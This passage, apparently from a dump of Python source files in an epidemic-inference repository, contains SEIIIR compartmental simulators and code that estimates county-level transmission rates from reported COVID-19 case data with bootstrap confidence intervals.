gamma, rho, N, report_delay, tx):\n \"\"\"\n This method simulates a deterministic seiiir model based on the given parameters.\n The model is continuous time and uses a scipy integrator\n \n Parameters\n ----------\n y0 : dict\n Initial values for the compartments. 
Should include keys for 'S', 'E', 'I1' ,'I2', 'I3', 'R'\n tf : int\n The number of days to simulate\n beta : float\n Transmission rate in contacts per day\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n rho : float\n This is the reporting factor. If rho=8, then 1 in 8 cases are reported\n N : number\n This is the overall population\n report_delay : int\n This is the number of days between infection and reporting\n tx : list of numbers or None\n The number of transmissions from external sources for each timestep. If set to None, then\n this is assumed to be zero\n \"\"\"\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n assert tx is None # not currently supported\n\n def model(y, t, beta, sigma, gamma, N):\n S=y[0]\n E=y[1]\n I1=y[2]\n I2=y[3]\n I3=y[4]\n R=y[5]\n C=y[6]\n\n rhs = np.zeros(7)\n rhs[0] = -beta*(I1+I2+I3)*S/N\n rhs[1] = beta*(I1+I2+I3)*S/N - sigma*E\n rhs[2] = sigma*E - 3*gamma*I1\n rhs[3] = 3*gamma*I1 - 3*gamma*I2\n rhs[4] = 3*gamma*I2 - 3*gamma*I3\n rhs[5] = 3*gamma*I3\n rhs[6] = beta*(I1+I2+I3)*S/N\n return rhs\n\n y = np.zeros(7)\n y[0] = y0['S']\n y[1] = y0['E']\n y[2] = y0['I1']\n y[3] = y0['I2']\n y[4] = y0['I3']\n y[5] = y0['R']\n y[6] = 0\n \n times = list(range(tf))\n\n y = odeint(lambda y,t : model(y, t, beta, sigma, gamma, N), y, times)\n S = y[:-1,0].tolist()\n E = y[:-1,1].tolist()\n I1 = y[:-1,2].tolist()\n I2 = y[:-1,3].tolist()\n I3 = y[:-1,4].tolist()\n R = y[:-1,5].tolist()\n C = y[:,6].tolist()\n T = [C[i+1]-C[i] for i in range(len(C)-1)]\n \n Cdates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(C)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(Cdates)-1):\n dates.append(Cdates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=Cdates, values=C)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n \n\ndef simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx):\n \"\"\"\n This method simulates a deterministic seiiir model based on the given parameters.\n The model is discrete time and discretized by days\n \n Parameters\n ----------\n y0 : dict\n Initial values for the compartments. Should include keys for 'S', 'E', 'I1' ,'I2', 'I3', 'R'\n tf : int\n The number of days to simulate\n beta : float\n Transmission rate in contacts per day\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. 
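A usage sketch for the tseir_utils helpers shown earlier (it assumes the epi_inference package and its pyomo dependency are importable, and the rate values below are illustrative only): cumulative reported cases are first differenced and then scaled by the reporting factor before the compartments are propagated.

from epi_inference.tseir_utils import reported_cases_from_cumulative, compute_compartments_decay

cumulative = [0, 2, 5, 9, 14]
print(reported_cases_from_cumulative(cumulative))        # [0, 2, 3, 4, 5]
cases, S, E, I1, I2, I3, R = compute_compartments_decay(
    cumulative_reported_cases=cumulative, population=10000,
    sigma=1/5.2, gamma_1=3/4.3, gamma_2=3/4.3, gamma_3=3/4.3,
    deltaP=7, reporting_factor=2.0)
print(cases)                                             # [0.0, 4.0, 6.0, 8.0, 10.0]
print(S)                                                 # susceptibles after removing the scaled cases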
Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n rho : float\n This is the reporting factor. If rho=8, then 1 in 8 cases are reported\n N : number\n This is the overall population\n report_delay : int\n This is the number of days between infection and reporting\n tx : list of numbers or None\n The number of transmissions from external sources for each timestep. If set to None, then\n this is assumed to be zero\n \"\"\"\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n if tx is None:\n tx = [0]*tf\n\n S = [None]*tf\n E = [None]*tf\n T = [None]*tf # new transmissions\n I1 = [None]*tf\n I2 = [None]*tf\n I3 = [None]*tf\n R = [None]*tf\n\n S[0] = y0['S']\n E[0] = y0['E']\n I1[0] = y0['I1']\n I2[0] = y0['I2']\n I3[0] = y0['I3']\n R[0] = y0['R']\n\n cm_rep_cases = [None]*(tf+1)\n cm_rep_cases[0] = 0\n\n T[0] = beta * (I1[0] + I2[0] + I3[0]) * S[0] / N + tx[0]\n for t in range(0,tf-1):\n #print(T[t], S[t], E[t], I1[t], I2[t],I3[t],cm_rep_cases[t])\n assert T[t] >= 0\n S[t+1] = S[t] - T[t]\n S[t+1] = max(0,S[t+1])\n\n E[t+1] = E[t] + T[t] - sigma*E[t]\n E[t+1] = max(0, E[t+1])\n\n I1[t+1] = I1[t] + sigma*E[t] - gamma*3*I1[t]\n I1[t+1] = max(0, I1[t+1])\n\n I2[t+1] = I2[t] + gamma*3*I1[t] - gamma*3*I2[t]\n I2[t+1] = max(0, I2[t+1])\n\n I3[t+1] = I3[t] + gamma*3*I2[t] - gamma*3*I3[t]\n I3[t+1] = max(0, I3[t+1])\n\n R[t+1] = R[t] + gamma*3*I3[t]\n assert R[t+1] >= 0\n\n cm_rep_cases[t+1] = cm_rep_cases[t] + 1/rho*T[t]\n T[t+1] = beta * (I1[t+1] + I2[t+1] + I3[t+1]) * S[t+1] / N + tx[t+1]\n\n cm_rep_cases[tf] = cm_rep_cases[tf-1] + 1/rho*T[tf-1]\n cm_rep_cases_dates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(cm_rep_cases_dates)-1):\n dates.append(cm_rep_cases_dates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=cm_rep_cases_dates, values=cm_rep_cases)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n\n\ndef simulate_discrete_seiiir_stochastic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx):\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n if tx is None:\n tx = [0]*tf\n\n\n # expand the parameters if necessary\n assert type(beta) is float or (type(beta) is np.ndarray and beta.dtype == np.float64)\n assert type(sigma) is float or (type(sigma) is 
np.ndarray and sigma.dtype == np.float64)\n assert type(gamma) is float or (type(gamma) is np.ndarray and gamma.dtype == np.float64)\n #assert type(report_delay) is int or (type(report_delay) is np.ndarray and report_delay.dtaype == np.int64)\n #assert type(rho) is float or (type(rho) is np.ndarray and rho.dtype == np.int64)\n\n if type(beta) is float:\n beta = beta*np.ones(tf)\n if type(sigma) is float:\n sigma = sigma*np.ones(tf)\n if type(gamma) is float:\n gamma = gamma*np.ones(tf)\n #if type(report_delay) is int:\n # report_delay = report_delay*np.ones(tf).astype(np.int64)\n if type(rho) is float:\n rho = rho*np.ones(tg)\n\n S = [None]*tf\n E = [None]*tf\n T = [None]*tf # new transmissions\n I1 = [None]*tf\n I2 = [None]*tf\n I3 = [None]*tf\n R = [None]*tf\n\n S[0] = y0['S']\n E[0] = y0['E']\n I1[0] = y0['I1']\n I2[0] = y0['I2']\n I3[0] = y0['I3']\n R[0] = y0['R']\n\n p_EI = 1-np.exp(-sigma)\n p_II = 1-np.exp(-3*gamma)\n for t in range(0,tf-1):\n p_expose = 1-np.exp(-beta[t]*(I1[t]+I2[t]+I3[t])/N)\n T[t] = np.random.binomial(S[t], p_expose) + tx[t]\n Etout = np.random.binomial(E[t], p_EI[t])\n I1tout = np.random.binomial(I1[t], p_II[t])\n I2tout = np.random.binomial(I2[t], p_II[t])\n I3tout = np.random.binomial(I3[t], p_II[t])\n S[t+1] = S[t] - T[t]\n E[t+1] = E[t] + T[t] - Etout\n I1[t+1] = I1[t] + Etout - I1tout\n I2[t+1] = I2[t] + I1tout - I2tout\n I3[t+1] = I3[t] + I2tout - I3tout\n R[t+1] = R[t] + I3tout\n\n # get the last entry for transmissions\n T[tf-1] = np.random.binomial(S[tf-1], p_expose) + tx[tf-1]\n\n cm_rep_cases = [0]*(tf+1)\n for tp in range(1,tf+1):\n cm_rep_cases[tp] = cm_rep_cases[tp-1] + 1/rho*T[tp-1]\n\n # create and shift the dates to account for reporting delay\n cm_rep_cases_dates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(cm_rep_cases_dates)-1):\n dates.append(cm_rep_cases_dates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=cm_rep_cases_dates, values=cm_rep_cases)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n\n \n" }, { "alpha_fraction": 0.49942541122436523, "alphanum_fraction": 0.5055186152458191, "avg_line_length": 42.91901397705078, "blob_id": "3c8e224dfe8f67900623a8bf9d30374df0d21644", "content_id": "cc734e9f983889e17d58a5163b0b423eb5b2733f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37419, "license_type": "no_license", "max_line_length": 237, "num_lines": 852, "path": "/epi_inference/ATTIC/inference.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport sys\nimport os\nimport math\nimport numpy\nimport datetime\nimport random\nimport pandas as pd\nimport yaml\nimport matplotlib.pyplot as plt\nfrom pyutilib.misc import Options\nfrom pyutilib.misc.timing import TicTocTimer\nfrom pyomo.environ import value\n\nfrom .util import factorial_iterator\nfrom .util import ToStr_JSONEncoder\nfrom . 
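A usage sketch for the discrete SEIIIR simulator defined above, with parameter values mirroring the package's own tests; note that this version returns Bunch containers (dict-like, attribute-accessible) rather than the tuples unpacked in the attic tests.

from epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic

N = 1_000_000
y0 = {'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3': 0, 'R': 0}
tf = 25
tx = [0] * tf
tx[10] = 1                                   # seed a single external transmission on day 10
sim = simulate_discrete_seiiir_deterministic(y0, tf, beta=0.5, sigma=1/5, gamma=1/4,
                                             rho=1, N=N, report_delay=7, tx=tx)
C = sim.cumulative_reported_cases['values']  # cumulative reported cases, length tf+1
dates = sim.cumulative_reported_cases['dates']
print(len(C), len(dates), C[-1])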
import formulations as frms\n\n\n#\n# Load data from a CSV file generated by 'epiinf collect'\n#\ndef load_csv_data(input_csv):\n df = pd.read_csv(input_csv, parse_dates=['Date'])\n df = df.set_index('Date')\n\n metadata = {}\n metafile = input_csv[:-4]+\"_meta.yml\"\n if os.path.isfile(metafile):\n with open(metafile, 'r') as INPUT:\n try:\n metadata = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: no cover\n print(\"ERROR: problem parsing YAML file \"+metafile)\n print(exc)\n sys.exit(1)\n\n return df, metadata\n\n#\n# Load geodata from a CSV file\n#\n\"\"\"\nTODO - delete\n\ndef load_geodata(geodata_csv):\n if not os.path.exists(geodata_csv): # pragma: no cover\n print(\"ERROR: missing file \"+geodata_csv)\n sys.exit(1)\n return pd.read_csv(geodata_csv, index_col='geoid')\n\"\"\"\n\n#\n# Process the arguments used for inference\n#\ndef process_config(cfg):\n config = Options()\n\n config.formulation = cfg['formulation']\n config.ntrials = cfg.get('ntrials', None)\n config.input_csv = cfg['input_csv']\n #config.output_json = cfg.get('output_json',None)\n config.population = cfg.get('population', None)\n config.filter_counties_by_cases = cfg.get('filter_counties_by_cases', 0)\n config.county = cfg.get('county', None)\n config.column = cfg.get('column', None)\n config.reporting_factor = cfg.get('reporting_factor', 1.0)\n config.deltaP = cfg.get('deltaP', 7)\n config.sigma = cfg.get('sigma', None)\n config.gamma = cfg.get('gamma', None)\n config.mobility_json = cfg.get('mobility_json', None)\n config.factor_levels = cfg.get('factor_levels', None)\n config.bootstrap = cfg.get('bootstrap', Options())\n config.analysis_window = cfg.get('analysis_window', Options())\n\n # TODO - deprecate the use of the geodata CSV file option\n if 'population_csv' not in cfg:\n config.population_csvfile = cfg.get('geodata_csv', config.input_csv[:-4] + \"_geodata.csv\")\n config.population_csvcolumn = 'pop2010'\n config.population_csvindex = 'geoid'\n else:\n config.population_csvfile = cfg['population_csv']['file']\n config.population_csvcolumn = cfg['population_csv']['population']\n config.population_csvindex = cfg['population_csv']['index']\n\n return config\n\ndef check_config(config):\n if config.county is not None and type(config.county) is not str: # pragma: no cover\n print(\"ERROR: county id must be specified as a string\")\n sys.exit(1)\n try:\n assert(os.path.exists(config.input_csv))\n except: # pragma: no cover\n print(\"ERROR: input file \"+config.input_csv+\" does not exist\")\n raise\n assert type(config.reporting_factor) is float\n \ndef run_single_node_from_config(df, population_df, CONFIG, verbose):\n column = CONFIG.column\n ntrials = CONFIG.get('ntrials', df.columns)\n formulation = CONFIG.formulation\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n population_config = CONFIG.population\n population_csvcolumn = CONFIG.population_csvcolumn\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n\n all_results = list()\n ndx = 0\n\n for t in df:\n if column is not None and t != column:\n continue\n ndx = ndx+1\n if not ntrials is None and ndx > ntrials:\n break\n\n if population_config is None:\n if t not in population_df[population_csvcolumn]: # pragma: no cover\n print(\"WARNING: county \"+str(t)+\" does not have population data available.\")\n continue\n population = population_df[population_csvcolumn][t]\n else:\n population = population_config\n 
cm_rep_cases = df[t].to_list()\n Cdates = df.index.to_list()\n\n #if df[t][-1] == 0:\n # results = {'est_beta':None, 'status':'skipped', 'msg':'No case data', 'population': population, 'total_cases': float(df[t][-1])}\n\n if df[t][-1] <= filter_counties_by_cases:\n results = {'est_beta':None, 'status':'skipped', 'msg':'cumulative cases <= {} (filter_counties_by_cases)'.format(filter_counties_by_cases), 'population': population, 'total_cases': float(df[t][-1])}\n\n elif formulation == 'decay-lsq':\n results = frms.run_decay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=Cdates)\n elif formulation == 'decay-blike':\n results = frms.run_decay_blike(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=Cdates)\n \"\"\"\n elif formulation == 'decay-multibeta-lsq':\n results = frms.run_decay_multibeta_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=report_delay,\n reporting_factor=reporting_factor)\n # analysis_window=analysis_window)\n \"\"\"\n else: # pragma: no cover\n print(\"ERROR: unknown formulation '%s'\" % formulation)\n sys.exit(1)\n\n results['FIPS'] = t\n #\n # Collect results in a list\n #\n all_results.append( results )\n return all_results\n\ndef run_multinode_from_config(df, population_df, CONFIG, verbose):\n formulation = CONFIG.formulation\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n mobility_dict = CONFIG.mobility_dict\n bootstrap = CONFIG.bootstrap\n bootstrap_percentile = bootstrap.get('percentile',5)\n bootstrap_n = bootstrap.get('n',100)\n bootstrap_seed = bootstrap.get('seed',None)\n bootstrap_value = bootstrap.get('value','est_beta')\n bootstrap_output_csv = bootstrap.get('output_csv', None)\n bootstrap_weighted = bootstrap.get('weighted', False)\n\n #\n # Error checking\n #\n nodes = [val for val in df.keys().to_list()]\n flag=False\n active_nodes = []\n for n in nodes:\n if not n in population_df: # pragma: no cover\n flag=True\n print(\"Population is missing for county: \"+str(n))\n if df[n][-1] > filter_counties_by_cases:\n active_nodes.append(n)\n else:\n print(\"WARNING: Skipping county '\"+str(n)+\"' in multinode estimation because it has no cases\")\n if flag: # pragma: no cover\n sys.exit(1)\n if len(active_nodes) == 0:\n return {'fraction_of_counties_with_cases': 0, 'est_beta':None}\n\n if bootstrap:\n if bootstrap_weighted:\n bootstrap_weights = population_df[active_nodes].copy()\n else:\n bootstrap_weights = population_df[active_nodes].copy()\n bootstrap_weights[bootstrap_weights.index] = 1\n\n #testing_bootstrap = population_df[active_nodes].copy()\n #testing_bootstrap[testing_bootstrap.index] = 0\n\n if bootstrap_seed is not None:\n random.seed(bootstrap_seed)\n\n all_results = []\n for i in range(bootstrap_n):\n DF = df.sample(n=len(df.keys()), replace=True, axis=1, random_state=random.randint(1000000,9999999), weights=bootstrap_weights)\n sampled_nodes = [val for val in DF.keys().to_list()]\n\n #for n in sampled_nodes:\n # testing_bootstrap[n] = testing_bootstrap[n] + 1\n populations = population_df[sampled_nodes]\n\n if formulation == 
'multinode-decay-lsq':\n results = frms.run_multinode_decay_lsq(DF,\n populations=populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=reporting_factor,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-decay-blike':\n results = frms.run_multinode_decay_blike(DF,\n population=populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=reporting_factor,\n Cdates=df.index.tolist())\n# elif formulation == 'multinode-decay-multibeta-lsq':\n# results = frms.run_multinode_decay_multibeta_lsq(DF,\n# population=populations,\n# sigma=sigma,\n# gamma=gamma,\n# deltaP=report_delay,\n# reporting_factor=reporting_factor)\n else:\n raise RuntimeError(\"Unknown formulation: \"+formulation)\n all_results.append(results)\n\n #print(testing_bootstrap/ (len(testing_bootstrap)*bootstrap_n))\n #print(bootstrap_weights/ sum(bootstrap_weights))\n #\n # Do the estimate with all the data\n #\n\n if formulation == 'multinode-decay-lsq':\n results = frms.run_multinode_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict(),\n Cdates=df.index.tolist())\n elif formulation == 'multinode-decay-blike':\n results = frms.run_multinode_decay_blike(df[active_nodes],\n population=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n deltaP=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict(),\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-decay-lsq':\n results = frms.run_multinode_mobility_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-window-decay-lsq':\n results = frms.run_multinode_mobility_window_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-time-varying-decay-lsq':\n results = frms.run_multinode_mobility_time_varying_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n# elif formulation == 'multinode-decay-multibeta-lsq':\n# results = frms.run_multinode_decay_multibeta_lsq(df[active_nodes],\n# population=population_df[active_nodes],\n# sigma=sigma,\n# gamma=gamma,\n# deltaP=report_delay,\n# reporting_factor=reporting_factor)\n else:\n raise RuntimeError(\"Unknown formulation: \"+formulation)\n\n\n #\n # Compute the confidence interval\n #\n if bootstrap:\n values = [r[bootstrap_value] for r in all_results]\n values.sort()\n results['bootstrap_mean_beta'] = numpy.mean(values)\n #results['bootstrap_mean_beta'] = statistics.mean(values)\n quantiles = [ \n numpy.quantile(values, bootstrap_percentile/100, axis=0),\n numpy.quantile(values, 1.0-bootstrap_percentile/100, axis=0)\n ]\n #quantiles = statistics.quantiles(values, n=100//bootstrap_percentile)\n results['bootstrap_'+str(bootstrap_percentile)+'%'] = 
quantiles[0]\n results['bootstrap_'+str(100-bootstrap_percentile)+'%'] = quantiles[-1]\n if verbose:\n print(\"Bootstrap Value\")\n print(values)\n print(\"Quantiles\")\n print(quantiles)\n if bootstrap_output_csv is not None:\n bootstrap_df = pd.DataFrame(values, columns=[\"est_beta\"])\n bootstrap_df.to_csv(bootstrap_output_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n assert(len(nodes) == len(df.keys()))\n results['num_counties'] = len(df.keys())\n results['fraction_of_counties_with_cases'] = len(active_nodes)/len(df.keys())\n return [results]\n\ndef run_multibeta_from_config(df, population_df, CONFIG, verbose):\n formulation = CONFIG.formulation\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n \n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n\n #\n # Error checking\n #\n nodes = [val for val in df.keys().to_list()]\n flag=False\n active_nodes = []\n for n in nodes:\n if not n in population_df: # pragma: no cover\n flag=True\n print(\"Population is missing for county: \"+str(n))\n if df[n][-1] > filter_counties_by_cases:\n active_nodes.append(n)\n else:\n print(\"WARNING: Skipping county '\"+str(n)+\"' in multinode estimation because it has no cases\")\n if flag: # pragma: no cover\n sys.exit(1)\n if len(active_nodes) == 0:\n return {'fraction_of_counties_with_cases': 0, 'est_beta':{}, 'est_omega':{}}\n\n #\n # Do the estimate with all the data\n #\n if formulation == 'multibeta-singleomega-decay-lsq':\n results = frms.run_multibeta_singleomega_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict())\n elif formulation == 'multibeta-singleomegawin-decay-lsq':\n results = frms.run_multibeta_singleomegawin_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window)\n elif formulation == 'multibeta-singleomegawin-decay-l1':\n results = frms.run_multibeta_singleomegawin_decay_l1(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window)\n elif formulation == 'multibeta-multiwin-decay-lsq':\n results = frms.run_multibeta_multiwin_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n else:\n raise RuntimeError(\"ERROR: Unknown model - \"+formulation)\n\n assert(len(nodes) == len(df.keys()))\n results['num_counties'] = len(df.keys())\n results['fraction_of_counties_with_cases'] = len(active_nodes)/len(df.keys())\n return [results]\n\n\n\"\"\"\nExample YAML file\ninference:\n - formulation: delay-ln-lsq\n deltaE: 5\n deltaI: 4\n deltaP: 7 # reporting delay (from time of infection to reported case)\n reportingfac: 1.0 # reporting factor (5 means actual cases = 5*reported)\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n - formulation: delay-lsq\n sigma: 0.1923076923 # 1/5.2\n gamma: 0.25 # 1/4\n deltaP: 7\n population: 4500000\n datafilename: data.csv\n 
daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n\"\"\"\ndef run(args):\n with open(args.config_file, 'r') as fd:\n config = yaml.safe_load(fd)\n\n if 'inference' not in config:\n raise ValueError('No \"inference\" key found in the YAML config')\n\n timer = TicTocTimer()\n for cfg in config.get('inference', []):\n timer.tic('Starting Inference')\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n output_csv = cfg.get('output_csv', None)\n output_json = cfg.get('output_json', None)\n\n assert output_csv is not None or output_json is not None \n assert type(verbose) is bool\n \n config = process_config(cfg)\n if verbose:\n print('Inference Configuration:\\n', config)\n\n all_results = []\n\n if factors is None:\n config_list = [config]\n else:\n config_list = factorial_iterator(factors, config)\n\n for CONFIG in config_list:\n try:\n population_df = pd.read_csv(CONFIG.population_csvfile, encoding=\"ISO-8859-1\", dtype={CONFIG.population_csvindex:'str'})\n population_df = population_df.set_index(CONFIG.population_csvindex)\n except:\n print(\"ERROR reading file \"+CONFIG.population_csvfile)\n raise\n check_config(CONFIG)\n if CONFIG.population is None and CONFIG.county is not None:\n CONFIG.population = population_df[CONFIG.population_csvcolumn][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n print(\"Input File: \"+CONFIG.input_csv+' with column '+str(CONFIG.column))\n #\n # Load the dataframe and experimental metadata (if it's available)\n #\n df, metadata = load_csv_data(CONFIG.input_csv)\n data = metadata.get('simulation parameters', None)\n if data is not None:\n if CONFIG.verbose:\n print('parameters used to create data')\n print(data)\n for key, value in data.items():\n CONFIG[key] = value\n\n #\n # load mobility data if needed\n #\n CONFIG.mobility_dict = {}\n if CONFIG.mobility_json is not None:\n try:\n with open(CONFIG.mobility_json, 'r') as fd:\n CONFIG.mobility_dict = json.load(fd)\n except:\n print(\"ERROR reading file \" + CONFIG.mobility_json)\n raise\n \n #\n # Execute inference\n #\n if CONFIG.formulation in ['decay-lsq', 'decay-blike', 'decay-multibeta-lsq']:\n results = run_single_node_from_config(df, population_df, CONFIG, verbose)\n elif CONFIG.formulation in ['multinode-mobility-time-varying-decay-lsq', 'multinode-mobility-window-decay-lsq', 'multinode-mobility-decay-lsq', 'multinode-decay-lsq', 'multinode-decay-blike', 'multinode-decay-multibeta-lsq']:\n results = run_multinode_from_config(df, population_df[CONFIG.population_csvcolumn], CONFIG, verbose)\n elif CONFIG.formulation.startswith('multibeta-'):\n results = run_multibeta_from_config(df, population_df[CONFIG.population_csvcolumn], CONFIG, verbose)\n else:\n raise ValueError('Invalid formulation', CONFIG.formulation, 'found in YAML file inference section.')\n #\n # Augment reported results\n #\n for trial in results:\n if data is not None:\n trial['est_R0'] = trial['est_beta']/float(data['gamma'])\n for key, value in data.items():\n if not key in trial:\n trial[key] = value\n if CONFIG.factor_levels is not None:\n for key, value in CONFIG.factor_levels.items():\n if not key in trial:\n trial[key] = value\n all_results.append( trial )\n \n #\n # Save results\n #\n if output_csv:\n print(\"Writing results in file \"+output_csv)\n filedir = os.path.dirname(output_csv)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n 
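            # Collect the per-trial result dictionaries into a single DataFrame and
            # write them as CSV (non-numeric fields quoted). Note that the est_R0
            # added above is est_beta / gamma, and is computed only when a companion
            # _meta.yml file with 'simulation parameters' accompanied the input CSV.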
